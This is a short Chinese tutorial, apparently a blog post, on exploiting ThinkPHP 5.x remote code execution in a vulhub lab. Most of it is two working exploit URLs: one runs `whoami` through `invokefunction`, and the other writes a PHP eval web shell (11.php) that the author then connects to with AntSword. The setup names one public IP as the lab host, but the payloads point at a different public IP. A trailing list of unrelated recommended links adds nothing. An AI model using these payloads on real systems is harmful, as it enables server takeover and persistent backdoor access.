Thinkphp(TP)框架漏洞攻略

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
18538162800余+1 天前
深入解析:什么是矩阵系统源码搭建定制化开发,支持OEM贴牌
java·服务器·html
code123131 天前
tomcat升级操作
java·tomcat
alexhilton1 天前
灵活、现代的Android应用架构:完整分步指南
android·kotlin·android jetpack
Suger9991 天前
centos网络打流测试
linux·网络·centos
小何好运暴富开心幸福1 天前
操作系统之初识Linux
linux·运维·服务器·bash
程序员小董1 天前
关于Unix Domain Socket的使用入门
服务器·unix
hnlgzb1 天前
build.gradle中的dependencies 中API
android
zuoyou-HPU1 天前
QT中的pyodbc.connect()函数
服务器·数据库·oracle
北京耐用通信1 天前
一“网”跨协议,万“设”皆可通!耐达讯自动化Modbus TCP转Profibus ,让控制无界,让能源有道。
网络·人工智能·网络协议·自动化·信息与通信
xiaguangbo1 天前
rust slint android 安卓
android·linux·rust